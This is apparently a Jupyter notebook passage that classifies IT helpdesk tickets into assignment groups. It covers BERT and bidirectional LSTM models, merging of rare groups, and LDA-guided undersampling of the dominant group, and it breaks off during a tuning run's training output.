INFO:tensorflow:segment_ids: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:label: 0 (id = 0)
INFO:tensorflow:*** Example ***
INFO:tensorflow:guid: test
INFO:tensorflow:tokens: [CLS] circuit out ##age india carrier company ##ap ##ind ##car ##rier ##dm ##v ##p ##nr ##tr type out ##age network x ##ci ##rc ##uit power type out ##age ce ##rt site yes ##non ##a start scheduled maintenance power yes ##non ##a power provider power schedule maintenance network yes ##non ##a main ##t yes ##no provider main ##tti ##cke ##t site backup circuit yes ##non ##a backup circuit active yes ##non ##a site contact not ##ify phone ##ema ##il yes ##non ##a remote dial ##in yes ##non ##a equipment reset yes ##non ##a verify site work backup circuit yes ##non ##a vendor global ##tel ##ec ##om ve ##riz ##on telecom ##ven ##dor telecom ##ven ##dor not ##ify gs ##c yes ##non ##a ce ##rt start yes ##non ##a [SEP]
INFO:tensorflow:input_ids: 101 4984 2041 4270 2634 6839 2194 9331 22254 10010 16252 22117 2615 2361 16118 16344 2828 2041 4270 2897 1060 6895 11890 14663 2373 2828 2041 4270 8292 5339 2609 2748 8540 2050 2707 5115 6032 2373 2748 8540 2050 2373 10802 2373 6134 6032 2897 2748 8540 2050 2364 2102 2748 3630 10802 2364 6916 19869 2102 2609 10200 4984 2748 8540 2050 10200 4984 3161 2748 8540 2050 2609 3967 2025 8757 3042 14545 4014 2748 8540 2050 6556 13764 2378 2748 8540 2050 3941 25141 2748 8540 2050 20410 2609 2147 10200 4984 2748 8540 2050 21431 3795 9834 8586 5358 2310 21885 2239 18126 8159 7983 18126 8159 7983 2025 8757 28177 2278 2748 8540 2050 8292 5339 2707 2748 8540 2050 102
INFO:tensorflow:input_mask: 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1
INFO:tensorflow:segment_ids: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:label: 0 (id = 0)
In [0]:
preds = []
for prediction in result:
      preds.append(np.argmax(prediction['probabilities']))
In [39]:
print("Accuracy of BERT is:",accuracy_score(y_test,preds))
Accuracy of BERT is: 0.6727486756915833
In [40]:
print(classification_report(y_test,preds))
              precision    recall  f1-score   support

           0       0.81      0.90      0.85       795
           1       0.00      0.00      0.00         6
           2       0.57      0.48      0.52        25
           3       0.00      0.00      0.00         4
           4       0.46      0.77      0.57        48
           5       0.34      0.56      0.42        27
           6       0.38      0.37      0.38        27
           7       1.00      0.10      0.18        10
           8       0.60      0.53      0.56        17
           9       0.95      1.00      0.97        19
          10       0.29      0.27      0.28        15
          11       0.28      0.30      0.29        43
          12       0.31      0.49      0.38        39
          13       0.00      0.00      0.00         6
          14       0.00      0.00      0.00         6
          15       0.10      1.00      0.18         1
          16       0.00      0.00      0.00         3
          17       0.82      0.91      0.86        68
          18       0.38      0.57      0.45        21
          19       0.33      0.14      0.20        14
          20       0.00      0.00      0.00         4
          21       0.00      0.00      0.00         8
          22       0.50      0.26      0.34        27
          23       0.35      0.23      0.28        39
          24       0.60      0.67      0.63         9
          25       0.43      0.21      0.29        14
          26       0.00      0.00      0.00         1
          27       0.23      0.24      0.23        21
          28       0.00      0.00      0.00        15
          29       0.00      0.00      0.00         1
          30       0.00      0.00      0.00         4
          31       0.00      0.00      0.00         5
          32       0.00      0.00      0.00         1
          33       0.00      0.00      0.00         7
          34       0.44      0.39      0.41        18
          35       0.17      0.11      0.13         9
          36       0.33      0.17      0.22         6
          37       0.00      0.00      0.00         9
          38       0.00      0.00      0.00         1
          39       0.00      0.00      0.00         2
          40       0.00      0.00      0.00         9
          41       0.00      0.00      0.00         1
          42       0.00      0.00      0.00         8
          43       0.00      0.00      0.00         3
          45       0.75      0.52      0.62        23
          46       0.00      0.00      0.00         4
          48       0.00      0.00      0.00         1
          49       0.00      0.00      0.00         3
          51       0.00      0.00      0.00         1
          52       0.00      0.00      0.00         1
          56       0.72      0.53      0.61        34
          57       0.00      0.00      0.00         3
          59       0.00      0.00      0.00         7
          61       0.00      0.00      0.00         1
          62       0.00      0.00      0.00         1
          63       0.00      0.00      0.00         3
          67       0.80      0.71      0.75        17
          69       0.00      0.00      0.00         1
          72       0.67      0.85      0.75       135
          73       0.52      0.33      0.41        48

    accuracy                           0.67      1699
   macro avg       0.24      0.23      0.21      1699
weighted avg       0.62      0.67      0.64      1699

/usr/local/lib/python3.6/dist-packages/sklearn/metrics/_classification.py:1272: UndefinedMetricWarning:

Precision and F-score are ill-defined and being set to 0.0 in labels with no predicted samples. Use `zero_division` parameter to control this behavior.

In [50]:
print("F1-Score of the model:")
f1_score(y_test, preds, average='weighted')
F1-Score of the model:
Out[50]:
0.6389044783575125

BERT model has shown better performance than the bidirectional LSTM model so far.

Testing a different approch on the tickets data!

We have many assignment groups those do not have enough samples to train the classifier model. And also around 48% of tickets data belongs to one assignment group GRP_0.Since our data is highly unbalanced and it is biased towards the GRP_0, we are experimenting the below approches in order to make the data more balanced.

  • Lets combine the minority assignment groups into a single group say 'others'
  • Lets downsample the GRP_0 in the training set

Since the data is highly biased towards GRP_0, model performance on other assignment groups are comparatively poor. So in order to make the model to train on the other assignment groups as well, we are downsampling the GRP_0 tickets.
But in the actual business data, we have more number of GRP_0 tickets and we dont want to manipulate the data to impact the actual business scenario. So we are just downsampling the GRP_0 only on the train data, so that our model can train to classify the other assignment groups as well and also keeping the test data as same as from the business process.

Clubbing the minority groups which have less than 30 samples (tickets) per assignment groups

In [41]:
#Lets Select all ticket Assignment groups which have only one ticket
rare_grps= tickets_corpus[tickets_corpus.groupby("Assignment group")["Assignment group"].transform('size') <30]['Assignment group'].unique()
rare_grps
Out[41]:
array(['GRP_21', 'GRP_23', 'GRP_27', 'GRP_35', 'GRP_36', 'GRP_37',
       'GRP_38', 'GRP_39', 'GRP_43', 'GRP_44', 'GRP_46', 'GRP_47',
       'GRP_48', 'GRP_49', 'GRP_50', 'GRP_51', 'GRP_52', 'GRP_53',
       'GRP_54', 'GRP_55', 'GRP_56', 'GRP_57', 'GRP_58', 'GRP_59',
       'GRP_60', 'GRP_61', 'GRP_32', 'GRP_62', 'GRP_63', 'GRP_64',
       'GRP_65', 'GRP_66', 'GRP_67', 'GRP_68', 'GRP_69', 'GRP_70',
       'GRP_71', 'GRP_72', 'GRP_73'], dtype=object)
In [42]:
#Lets check the total number of rare assignment groups
rare_grps.size
Out[42]:
39
In [43]:
#Create a different dataframe for the tickets belongs to the rare groups
rare_df = tickets_corpus[tickets_corpus['Assignment group'].isin(rare_grps)]
rare_df.shape
Out[43]:
(357, 11)
In [44]:
# Rename the Assignment group attribute
rare_df['Assignment group'] = 'others'
#Lets check whether the group name has changed to 'others'
print(rare_df['Assignment group'].head(3))
197    others
206    others
247    others
Name: Assignment group, dtype: object
/usr/local/lib/python3.6/dist-packages/ipykernel_launcher.py:2: SettingWithCopyWarning:


A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead

See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy

In [45]:
#creating a dataframe excluding the rare groups from our original data
grp_exl_df = tickets_corpus[~tickets_corpus['Assignment group'].isin(rare_grps)]
grp_exl_df.shape
Out[45]:
(8134, 11)
In [46]:
#Now lets add the rare groups df (having one assignment group as 'others') to the excluded dataframe 
ticket_df = pd.concat([grp_exl_df,rare_df]).reset_index(drop=True)
ticket_df.shape
Out[46]:
(8491, 11)

Now we have clubbed the minority assignment groups into a single group. Now lets downsample the GRP_0

UnderSampling GRP_0

  • Use only train dataset for undersampling GRP_0. We are keepting test data as it is , in this case.
  • Build a Topic Model with top 3 different topics where each topic is a combination of keywords and each keyword contributes a certain weightage to the topic.
  • Run LDA for each record of GRP_0 to find the associated topic based on the LDA score. As the topic modeling has been trained to accomodate only top 3 or 4 topics for entire GRP_0 data, any record scoring less than 50%, we categorize them into next (other) topic and such tickets are not the candidates for resampling.
  • use RandomUnderSampler
In [47]:
#Lets split the data for training and testing for the undersampling from the ticket_df
X=ticket_df['ticket_Desc_lemm'].values
y2=ticket_df['Assignment group'].values
X_train, X_test, y_train, y_test = train_test_split(X, y2, test_size=0.2, random_state=1)
X_train.shape, X_test.shape, y_train.shape, y_test.shape

X_train.shape, X_test.shape, y_train.shape, y_test.shape
Out[47]:
((6792,), (1699,), (6792,), (1699,))
In [48]:
#Take only the training datasets(X_train and y_train) and covert it into a dataframe for futher processing
X_col_names=["ticket_Desc_lemm"]
y_col_names=["Assignment group"]
df_X = pd.DataFrame(X_train,columns = X_col_names)
df_Y = pd.DataFrame(y_train,columns = y_col_names)
df_train = pd.concat([df_X, df_Y], axis=1)
print("Shape of df_train:",df_train.shape)
df_train.head(5)
Shape of df_train: (6792, 2)
Out[48]:
ticket_Desc_lemm Assignment group
0 error login sid system error login sid systemverifie user detailsemployee manager nameuser passwordmanagementtool pwd managerunlocke reset todaypaycaller confirm loginissue resolve GRP_0
1 pobleme mit wecombi jionmpsf wnkpzcmv pobleme mit wecombi jionmpsf wnkpzcmv GRP_24
2 standby laptop mcae day oct dear saravthsyanawe need standby laptop hall day mcae courseshould microsoft office adobe reader vlc showplease ready today collect morning deptthanke GRP_19
3 unable print request printer driver unable print request printer driver GRP_0
4 enable access code cvn view draw enable access code cvn view draw GRP_0
In [49]:
# filter the records assigned to only GRP_0
grp0_tickets = df_train[df_train['Assignment group'] == 'GRP_0']
grp0_tickets["Assignment group"].head(5)
Out[49]:
0    GRP_0
3    GRP_0
4    GRP_0
7    GRP_0
8    GRP_0
Name: Assignment group, dtype: object

Latent Dirichlet Allocation(LDA)

It is a popular algorithm for topic modeling with excellent implementations in the Python’s Gensim package to extract the hidden topics from large volumes of text.It builds a topic per document model and words per topic model, modeled as Dirichlet distributions. Let's first use gensim to implement LDA and we are going to apply LDA to GRP_0 and split them into different topics.
The main inputs needed for doing LDA is:

  • corpus
  • dictionary of words with term frequency
In [0]:
# Vectorizations
def sent_to_words(sentences):
    for sentence in sentences:
        yield(gensim.utils.simple_preprocess(str(sentence), deacc=True))  # deacc=True removes punctuations

# Tokenize the ticket_Desc attribute of GRP_0 records
df_words = list(sent_to_words(grp0_tickets['ticket_Desc_lemm'].values.tolist()))
df_words = [[word for word in simple_preprocess(str(doc)) if word not in STOPWORDS] for doc in df_words]

# Build the bigram
bigram = gensim.models.Phrases(df_words, min_count=5, threshold=100) # higher threshold fewer phrases.

# Faster way to get a sentence clubbed as bigram
bigram_mod = gensim.models.phrases.Phraser(bigram)
df_words_bigrams = [bigram_mod[doc] for doc in df_words]

# Create Dictionary
id2word = corpora.Dictionary(df_words_bigrams)
# Term Document Frequency
#using doc2bow,we create a dictionary reporting how many words and how many times those words appear.
corpus = [id2word.doc2bow(text) for text in df_words_bigrams]
In [52]:
#Lets build the LDA model
lda_model = gensim.models.ldamodel.LdaModel(corpus=corpus,
                                           id2word=id2word,
                                           num_topics=3, 
                                           random_state=100,
                                           update_every=1,
                                           chunksize=100,
                                           passes=10,
                                           alpha='auto',
                                           per_word_topics=True)

for idx, topic in lda_model.print_topics():
    print('Topic: {} \nWords: {}'.format(idx+1, topic))
    print()
Topic: 1 
Words: 0.116*"password" + 0.073*"reset" + 0.059*"user" + 0.051*"sid" + 0.047*"login" + 0.027*"account" + 0.021*"change" + 0.021*"unlock" + 0.015*"request" + 0.011*"windows"

Topic: 2 
Words: 0.056*"lock" + 0.047*"update" + 0.043*"account" + 0.018*"crm" + 0.017*"inplant" + 0.011*"ticketno" + 0.010*"engineeringtool" + 0.010*"window" + 0.009*"iphone" + 0.008*"device"

Topic: 3 
Words: 0.051*"unable" + 0.030*"outlook" + 0.025*"issue" + 0.021*"work" + 0.019*"access" + 0.016*"connect" + 0.015*"error" + 0.013*"log" + 0.013*"vpn" + 0.013*"open"

As we can see in the above output,the whole document is classfied into 3 topics and displayed the high weighted words for each topic.

In [0]:
#Run LDA for GRP_0
#Function to determine the topic
TOPICS = {1: "Password reset", 2:"account lock", 3:"connection issues",4:"others"}
def get_groups(text):
    bow_vector = id2word.doc2bow([word for word in simple_preprocess(text) if word not in STOPWORDS])
    index, score = sorted(lda_model[bow_vector][0], key=lambda tup: tup[1], reverse=True)[0]
    return TOPICS[index+1 if score > 0.5 else 4], round(score, 2)
In [54]:
# Check for a Random record
text = grp0_tickets.reset_index().loc[np.random.randint(0, grp0_tickets.shape[1]),'ticket_Desc_lemm']
topic, score = get_groups(text)
print(f'Text:{text}\nTopic:{topic}\nScore:{score}')
Text:error login sid system error login sid systemverifie user detailsemployee manager nameuser passwordmanagementtool pwd managerunlocke reset todaypaycaller confirm loginissue resolve
Topic:Password reset
Score:0.9800000190734863
In [55]:
# Apply the function to the df[ticket_Desc_lemm]
grp0_tickets.insert(loc=grp0_tickets.shape[1]-1, 
                   column='Topic', 
                   value=[get_groups(text)[0] for text in grp0_tickets.ticket_Desc_lemm])
grp0_tickets.head()
Out[55]:
ticket_Desc_lemm Topic Assignment group
0 error login sid system error login sid systemverifie user detailsemployee manager nameuser passwordmanagementtool pwd managerunlocke reset todaypaycaller confirm loginissue resolve Password reset GRP_0
3 unable print request printer driver unable print request printer driver connection issues GRP_0
4 enable access code cvn view draw enable access code cvn view draw connection issues GRP_0
7 access ethic training link receive error message error organization code log public internet internet vpn connection issues GRP_0
8 passwordproblem hii change password passwordmanager lock totallywould kind unlock change mit freundlichen grenagjzikpf nhfrbxekanalyst logisticsagjzikpfnhfrbxekgmailcommailcompany share services gmbhgeschftsfhrer phvkowml azbtkqwx naruedlk mpvhakdqdiese mitteilung ist einzig und allein die nutzung durch den adressaten bestimmt und kann informationen enthalten die schutzwrdig vertraulich oder nach geltendem recht von der offenlegung ausgenomman sind die verbreitung verteilung oder vervielfltigung dieser mitteilung durch personen bei denen sich nicht die beabsichtigten empfnger handelt ist streng verboten wenn diese mitteilung aufgrund eines versehens bei ihnen eingegangen ist dann benachrichtigen sie bitte den absender und lschen sie diese mitteilungcompanypost select link view disclaimer alternate language account lock GRP_0
In [56]:
# Count the records based on Topics
grp0_tickets.Topic.value_counts()
Out[56]:
connection issues    1521
Password reset        908
account lock          613
others                139
Name: Topic, dtype: int64
In [57]:
X_sam= grp0_tickets.drop(['Assignment group','Topic'], axis=1)
y_sam=grp0_tickets.Topic
len(X_sam),len(y_sam)
Out[57]:
(3181, 3181)
In [58]:
def plot_pie(y):
    """ a function to plot the pie chart showing the percentage of data in differnt topics after LDA"""
    target_stats = Counter(y)
    labels = list(target_stats.keys())
    sizes = list(target_stats.values())
    explode = tuple([0.1] * len(target_stats))

    def make_autopct(values):
        def my_autopct(pct):
            total = sum(values)
            val = int(round(pct * total / 100.0))
            return '{p:.2f}%  ({v:d})'.format(p=pct, v=val)
        return my_autopct

    fig, ax = plt.subplots()
    ax.pie(sizes, explode=explode, labels=labels, shadow=True,
           autopct=make_autopct(sizes))
    ax.axis('equal')

# Instantiate the UnderSampler class
sampling_strategy = 'auto'
rus = RandomUnderSampler(sampling_strategy=sampling_strategy, random_state=0)
# Fit the data
X_res, y_res = rus.fit_resample(X_sam,y_sam)
print('Information of the data set after making it '
      'balanced by under-sampling: \n sampling_strategy={} \n y: {}'
      .format(sampling_strategy, Counter(y_res)))
plot_pie(y_res)
Information of the data set after making it balanced by under-sampling: 
 sampling_strategy=auto 
 y: Counter({'Password reset': 139, 'account lock': 139, 'connection issues': 139, 'others': 139})
/usr/local/lib/python3.6/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning:

Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.

In [59]:
#converting the above output numpy array to dataframe for further processing.
col_names = X_sam.columns
X_res  = pd.DataFrame(X_res,columns = col_names)
y_res = pd.DataFrame(y_res,columns = ['Topic'])
type(y_res),type(X_res)
Out[59]:
(pandas.core.frame.DataFrame, pandas.core.frame.DataFrame)
In [60]:
# Combine Topic and Assignment Group columns
grp0_df = pd.concat([X_res, y_res], axis=1)
grp0_df.shape
Out[60]:
(556, 2)
In [0]:
grp0_df["Assignment group"] = 'GRP_0'
grp0_df.drop(['Topic'], axis=1, inplace=True)
In [62]:
print(grp0_df.columns)
print(grp0_df['Assignment group'].head())
print("Total size of GRP_0 tickets after LDA:",grp0_df.shape)
Index(['ticket_Desc_lemm', 'Assignment group'], dtype='object')
0    GRP_0
1    GRP_0
2    GRP_0
3    GRP_0
4    GRP_0
Name: Assignment group, dtype: object
Total size of GRP_0 tickets after LDA: (556, 2)
In [63]:
#Create a dataframe exluding the GRP_0 tickets
df_excl_grp0 = df_train[df_train['Assignment group'] != 'GRP_0']

# Join the undersampled GRP_0 dataset to the excluded dataset
df = pd.concat([grp0_df, df_excl_grp0]).reset_index(drop=True)
df.shape
Out[63]:
(4167, 2)
In [64]:
print(df.columns)
df[df["Assignment group"] == 'GRP_0'].count()
Index(['ticket_Desc_lemm', 'Assignment group'], dtype='object')
Out[64]:
ticket_Desc_lemm    556
Assignment group    556
dtype: int64

Lets visualize the assignment groups distribution after balancing

In [65]:
print('Unique groups remaining:', df['Assignment group'].nunique())
plt.figure(figsize=(20,12))
sns.set_style("whitegrid")
sns.countplot(df['Assignment group'])
plt.xticks(rotation=90)
plt.xlabel("Assignment groups")
plt.ylabel("Count")
plt.title("Frquency of Assignment Groups after undersampling and clubbing",fontsize=18)
Unique groups remaining: 36
Out[65]:
Text(0.5, 1.0, 'Frquency of Assignment Groups after undersampling and clubbing')
In [66]:
#Creating the training datasets after undersampling
X_train = df["ticket_Desc_lemm"]
y_train = df["Assignment group"]
X_train.shape,y_train.shape
Out[66]:
((4167,), (4167,))
In [67]:
#Tokenize the data for the model
X_train=tokenizer.texts_to_sequences(df['ticket_Desc_lemm'])
X_train = pad_sequences(X_train, padding='post',maxlen = maxlen)
X_test=tokenizer.texts_to_sequences(ticket_df['ticket_Desc_lemm'])
X_test = pad_sequences(X_test, padding='post',maxlen = maxlen)
y_train = pd.get_dummies(df['Assignment group']).values
y_test= pd.get_dummies(ticket_df['Assignment group']).values
X_train.shape,y_train.shape,X_test.shape,y_test.shape
Out[67]:
((4167, 300), (4167, 36), (8491, 300), (8491, 36))
In [74]:
#Bidirectional model with merge_mode="sum" and kernel_initializer as 'GlorotNormal()'
model = Sequential()
model.add(Embedding(input_dim=num_words, 
                        output_dim=embedding_size, 
                        weights=[embedding_matrix], 
                        input_length=maxlen, 
                        mask_zero=True,
                        trainable=False))
model.add(SpatialDropout1D(0.2))
model.add(Bidirectional(LSTM(100, dropout=0.2, recurrent_dropout=0.2), merge_mode="sum"))
model.add(Dense(100, activation='relu', kernel_initializer=initializer))
model.add(Dropout(0.1))
model.add(Dense(36, activation='softmax'))
WARNING:tensorflow:Layer lstm_1 will not use cuDNN kernel since it doesn't meet the cuDNN kernel criteria. It will use generic GPU kernel as fallback when running on GPU
WARNING:tensorflow:Layer lstm_1 will not use cuDNN kernel since it doesn't meet the cuDNN kernel criteria. It will use generic GPU kernel as fallback when running on GPU
WARNING:tensorflow:Layer lstm_1 will not use cuDNN kernel since it doesn't meet the cuDNN kernel criteria. It will use generic GPU kernel as fallback when running on GPU
In [76]:
model.summary()
Model: "sequential_1"
_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
embedding_1 (Embedding)      (None, 300, 200)          3564600   
_________________________________________________________________
spatial_dropout1d_1 (Spatial (None, 300, 200)          0         
_________________________________________________________________
bidirectional_1 (Bidirection (None, 100)               240800    
_________________________________________________________________
dense (Dense)                (None, 100)               10100     
_________________________________________________________________
dropout (Dropout)            (None, 100)               0         
_________________________________________________________________
dense_1 (Dense)              (None, 36)                3636      
=================================================================
Total params: 3,819,136
Trainable params: 254,536
Non-trainable params: 3,564,600
_________________________________________________________________
In [0]:
#Configure the model.
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
In [81]:
history_B = model.fit(X_train, 
                    y_train, 
                    epochs=epochs, 
                    batch_size=batch_size,
                    validation_data=(X_test, y_test),
                    callbacks=[modelcheckpoint,EarlyStopping(monitor='val_loss', patience=5, min_delta=0.0001)])
Epoch 1/20
70/70 [==============================] - 290s 4s/step - loss: 2.8861 - accuracy: 0.2510 - val_loss: 1.9600 - val_accuracy: 0.5282
Epoch 2/20
70/70 [==============================] - 290s 4s/step - loss: 2.2669 - accuracy: 0.3653 - val_loss: 1.8452 - val_accuracy: 0.4912
Epoch 3/20
70/70 [==============================] - 289s 4s/step - loss: 2.0280 - accuracy: 0.4092 - val_loss: 1.5183 - val_accuracy: 0.5644
Epoch 4/20
70/70 [==============================] - 289s 4s/step - loss: 1.8723 - accuracy: 0.4401 - val_loss: 1.5454 - val_accuracy: 0.5535
Epoch 5/20
70/70 [==============================] - 290s 4s/step - loss: 1.7340 - accuracy: 0.4730 - val_loss: 1.4487 - val_accuracy: 0.5627
Epoch 6/20
70/70 [==============================] - 290s 4s/step - loss: 1.6355 - accuracy: 0.5068 - val_loss: 1.4898 - val_accuracy: 0.5512
Epoch 7/20
70/70 [==============================] - 291s 4s/step - loss: 1.5339 - accuracy: 0.5128 - val_loss: 1.2471 - val_accuracy: 0.6310
Epoch 8/20
70/70 [==============================] - 291s 4s/step - loss: 1.4257 - accuracy: 0.5568 - val_loss: 1.2740 - val_accuracy: 0.6208
Epoch 9/20
70/70 [==============================] - 289s 4s/step - loss: 1.3576 - accuracy: 0.5786 - val_loss: 1.2709 - val_accuracy: 0.6168
Epoch 10/20
70/70 [==============================] - 288s 4s/step - loss: 1.2970 - accuracy: 0.5896 - val_loss: 1.2144 - val_accuracy: 0.6489
Epoch 11/20
70/70 [==============================] - 291s 4s/step - loss: 1.2175 - accuracy: 0.6187 - val_loss: 1.1577 - val_accuracy: 0.6608
Epoch 12/20
70/70 [==============================] - 294s 4s/step - loss: 1.1436 - accuracy: 0.6333 - val_loss: 1.1698 - val_accuracy: 0.6638
Epoch 13/20
70/70 [==============================] - 294s 4s/step - loss: 1.0907 - accuracy: 0.6513 - val_loss: 1.1611 - val_accuracy: 0.6802
Epoch 14/20
70/70 [==============================] - 297s 4s/step - loss: 1.0367 - accuracy: 0.6731 - val_loss: 1.0667 - val_accuracy: 0.6997
Epoch 15/20
70/70 [==============================] - 301s 4s/step - loss: 0.9645 - accuracy: 0.6875 - val_loss: 1.1353 - val_accuracy: 0.6835
Epoch 16/20
70/70 [==============================] - 293s 4s/step - loss: 0.9049 - accuracy: 0.7055 - val_loss: 1.0791 - val_accuracy: 0.7030
Epoch 17/20
70/70 [==============================] - 300s 4s/step - loss: 0.8744 - accuracy: 0.7202 - val_loss: 1.2125 - val_accuracy: 0.6717
Epoch 18/20
70/70 [==============================] - 296s 4s/step - loss: 0.8253 - accuracy: 0.7341 - val_loss: 1.2189 - val_accuracy: 0.6846
Epoch 19/20
70/70 [==============================] - 292s 4s/step - loss: 0.8061 - accuracy: 0.7394 - val_loss: 1.2337 - val_accuracy: 0.6851
In [0]:
model.load_weights(output_dir+"/weights.19.hdf5")    # saving the weights 
In [82]:
acc_test =model.evaluate(X_test,y_test)
print("Test Accuracy:",acc_test[1])

acc_train =model.evaluate(X_train,y_train)
print("Train Accuracy:",acc_train[1])
266/266 [==============================] - 98s 367ms/step - loss: 1.2337 - accuracy: 0.6851
Test Accuracy: 0.6850783228874207
131/131 [==============================] - 48s 367ms/step - loss: 0.5218 - accuracy: 0.8411
Train Accuracy: 0.8411327004432678
In [0]:
y_predB = model.predict(X_test)
In [86]:
groups = ticket_df['Assignment group'].unique()
print('Classification report:\n %s' % (classification_report(y_test.argmax(axis=1), y_predB.argmax(axis=1),target_names=groups)))
Classification report:
               precision    recall  f1-score   support

       GRP_0       0.96      0.61      0.75      3968
       GRP_1       1.00      0.42      0.59        31
       GRP_3       0.61      0.47      0.53       140
       GRP_4       0.60      0.70      0.65        30
       GRP_5       0.62      0.79      0.70       257
       GRP_6       0.72      0.83      0.77       145
       GRP_7       0.72      0.78      0.75       118
       GRP_8       0.69      0.90      0.78        39
       GRP_9       0.56      0.79      0.66        85
      GRP_10       0.84      1.00      0.92        81
      GRP_11       0.81      0.77      0.79        88
      GRP_12       0.47      0.84      0.61       215
      GRP_13       0.51      0.88      0.64       241
      GRP_14       0.88      0.78      0.82        36
      GRP_15       0.48      0.77      0.59        31
      GRP_16       0.89      0.95      0.92       289
      GRP_17       0.54      0.84      0.66       116
      GRP_18       0.36      0.75      0.49        56
      GRP_19       0.62      0.68      0.65        44
       GRP_2       0.75      0.78      0.77        97
      GRP_20       0.49      0.85      0.62       200
      GRP_22       0.45      0.82      0.58        39
      GRP_24       0.56      0.58      0.57        69
      GRP_25       0.55      0.82      0.66       107
      GRP_26       0.38      0.72      0.50        61
      GRP_28       0.55      0.73      0.63       100
      GRP_29       0.71      0.78      0.74        45
      GRP_30       0.88      0.93      0.90        40
      GRP_31       0.59      0.70      0.64        37
      GRP_33       0.76      0.54      0.63        35
      GRP_34       0.65      0.10      0.17       129
      GRP_40       0.86      0.32      0.47       184
      GRP_41       0.47      0.75      0.58        68
      GRP_42       0.54      0.94      0.69       661
      GRP_45       0.52      0.36      0.43       252
      others       0.41      0.71      0.52       357

    accuracy                           0.69      8491
   macro avg       0.64      0.72      0.65      8491
weighted avg       0.77      0.69      0.69      8491

Plot the accuracy of the classfier

In [88]:
plt.plot(history_B.history['accuracy'])
plt.plot(history_B.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()

Plot the Loss of the classifier

In [89]:
plt.plot(history_B.history['loss'])
plt.plot(history_B.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
In [94]:
#ROC-AUC Score of the Model:
"{:0.2f}".format(roc_auc_score(y_test,y_predB)*100.0)
Out[94]:
'97.72'

Lets tune this model further!

Changing the number of LSTM neurons from 100 to 150

In [70]:
#Bidirectional model with 150 LSTM neurons , merge_mode="sum" and kernel_initializer as 'GlorotNormal()'
model_chgNeur = Sequential()
model_chgNeur.add(Embedding(input_dim=num_words, 
                        output_dim=embedding_size, 
                        weights=[embedding_matrix], 
                        input_length=maxlen, 
#                        mask_zero=True,
                        trainable=False))
model_chgNeur.add(SpatialDropout1D(0.2))
model_chgNeur.add(Bidirectional(LSTM(150, dropout=0.2, recurrent_dropout=0.2), merge_mode="sum"))
model_chgNeur.add(Dense(100, activation='relu', kernel_initializer=initializer))
model_chgNeur.add(Dropout(0.1))
model_chgNeur.add(Dense(36, activation='softmax'))
#Configure the model.
model_chgNeur.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
history_B1 = model_chgNeur.fit(X_train, 
                    y_train, 
                    epochs=epochs, 
                    batch_size=batch_size,
                    validation_data=(X_test, y_test),
                    callbacks=[modelcheckpoint,EarlyStopping(monitor='val_loss', patience=5, min_delta=0.0001)])
WARNING:tensorflow:Layer lstm will not use cuDNN kernel since it doesn't meet the cuDNN kernel criteria. It will use generic GPU kernel as fallback when running on GPU
WARNING:tensorflow:Layer lstm will not use cuDNN kernel since it doesn't meet the cuDNN kernel criteria. It will use generic GPU kernel as fallback when running on GPU
WARNING:tensorflow:Layer lstm will not use cuDNN kernel since it doesn't meet the cuDNN kernel criteria. It will use generic GPU kernel as fallback when running on GPU
Epoch 1/20
70/70 [==============================] - 219s 3s/step - loss: 2.8185 - accuracy: 0.2772 - val_loss: 1.9762 - val_accuracy: 0.4599
Epoch 2/20
70/70 [==============================] - 221s 3s/step - loss: 2.2078 - accuracy: 0.3777 - val_loss: 1.7211 - val_accuracy: 0.5031
Epoch 3/20
70/70 [==============================] - 222s 3s/step - loss: 1.9631 - accuracy: 0.4183 - val_loss: 1.4991 - val_accuracy: 0.5705
Epoch 4/20
70/70 [==============================] - 223s 3s/step - loss: 1.7776 - accuracy: 0.4615 - val_loss: 1.5305 - val_accuracy: 0.5474
Epoch 5/20
70/70 [==============================] - 225s 3s/step - loss: 1.6595 - accuracy: 0.5008 - val_loss: 1.4100 - val_accuracy: 0.5813
Epoch 6/20
70/70 [==============================] - 224s 3s/step - loss: 1.5462 - accuracy: 0.5342 - val_loss: 1.3282 - val_accuracy: 0.6104
Epoch 7/20
70/70 [==============================] - 224s 3s/step - loss: 1.4602 - accuracy: 0.5491 - val_loss: 1.2213 - val_accuracy: 0.6446
Epoch 8/20
